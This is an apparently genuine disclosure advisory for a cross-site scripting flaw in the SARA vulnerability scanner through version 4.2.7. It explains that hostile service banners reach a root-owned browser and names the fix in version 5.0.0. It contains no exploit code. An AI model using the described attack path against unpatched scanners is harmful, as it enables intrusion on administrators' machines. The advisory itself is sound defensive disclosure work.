XSS Vulnerability in Security Auditor's Research Assistant (SARA) versions before 5.0.0 Affects: SARA versions 4.2.6 and 4.2.7. Older versions not tested, presumably affected. Related software (sharing common ancestry): SATAN 1.1.1 would not run properly on my test platform, but checking the code it did not look like it was affected. SAINT does not appear to be affected. Because of licensing constraints, I was only able to test a rather old verion (3.1.2), but Saint Corporation was contacted and indicated version 5.1.2 is not affected, and state that earlier versions should also be unaffected. Description: SARA, a descendent of SATAN, is a tool for probing networks for vulnerabilities (ideally to fix them). It creates its own mini-http server to enable the user to interact with the main process through a standard web browser. If scanning in interactive mode, information about target hosts and services running on them is displayed, and in some cases this includes banners from the service. In SARA version 4.2.7 and before, the service banners were not properly sanitized, allowing HTML content in the banner to be processed by the administrative web browser. This allows standard cross site scripting issues, which might be seriously exascerbated by the facts that: i) the normal mode of operation is for the web browser to be started by sara, and as sara must be run as root for scanning operations, the web browser is typically a root owned process. ii) The simplified http server automatically assigns the values of html form variables to global variables in the Perl script with the same name. Solution: Advanced Research Corporation was contacted about the issue 20 Nov, and has included code in version 5.0.0 of the package to deal with the problem. Upgrading is recommended (see http://www-arc.com/sara/ for download information.) I would also recommend against performing scans in interactive mode in any these packages. Instead, I recommend that scans be run from the command line (or a script), thereby avoiding the invocation of the interactive http interface as root. Data analysis does not require root privileges, and it would be safer to only use the interactive interface with less privileged accounts (though access to the results files still required). Tom Payerle Dept of Physics payerle@physics.umd.edu University of Maryland (301) 405-6973 College Park, MD 20742-4111 Fax: (301) 314-9525
